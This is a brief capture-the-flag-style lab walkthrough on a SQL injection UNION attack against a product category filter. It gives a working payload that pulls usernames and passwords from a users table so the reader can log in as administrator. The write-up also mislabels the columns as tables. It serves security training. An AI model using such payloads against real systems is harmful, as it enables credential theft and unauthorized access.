1.5 Lab: SQL injection UNION attack, retrieving data from other tables | 2023

This lab contains a SQL injection vulnerability in the product category filter. so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs. The database contains a different table called users, with columns called username and password | Karthikeyan Nagaraj

Description

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

1. As we know the database contains 2 tables called username and password, so the query will be like '+UNION+SELECT+username,+password+FROM+users--
2. Use the above query in any category parameter to display the data from the username and password column
3. Use the credentials and log in to the admin Account to solve the lab

If you would like to support me so that I can create more free content — https://www.buymeacoffee.com/cyberw1ng

Thank you for Reading!

Happy Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials